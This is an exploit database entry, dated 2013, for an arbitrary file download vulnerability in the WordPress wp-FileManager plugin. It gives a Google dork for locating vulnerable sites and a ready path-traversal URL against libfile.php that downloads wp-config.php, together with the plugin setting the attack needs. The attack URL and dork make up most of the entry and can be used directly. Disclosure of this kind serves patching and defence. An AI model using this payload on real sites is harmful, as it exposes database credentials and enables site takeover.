Wordpress wp-FileManager - Arbitrary File Download Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Wordpress wp-FileManager - Arbitrary File Download Vulnerability
# Published : 2013-05-14
# Author :
# Previous Title : Wireless Disk PRO v2.3 iOS - Multiple Vulnerabilities
# Next Title : b2evolution 4.1.6 - Multiple Vulnerabilities

Title: Wordpress wp-FileManager Local File Download Vulnerability
Author: ByEge
Download: http://wordpress.org/extend/plugins/wp-filemanager/
Test Platform: Linux
Images: http://j1305.hizliresim.com/19/f/n0xxf.jpg
Vuln. Plat.: Web Application



Google Dorks: inurl:wp-content/plugins/wp-filemanager/
Test : http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download

# Exploit-DB Note:
# In order for this to work, the "Allow Download" setting must be checked in the FileManager's settings.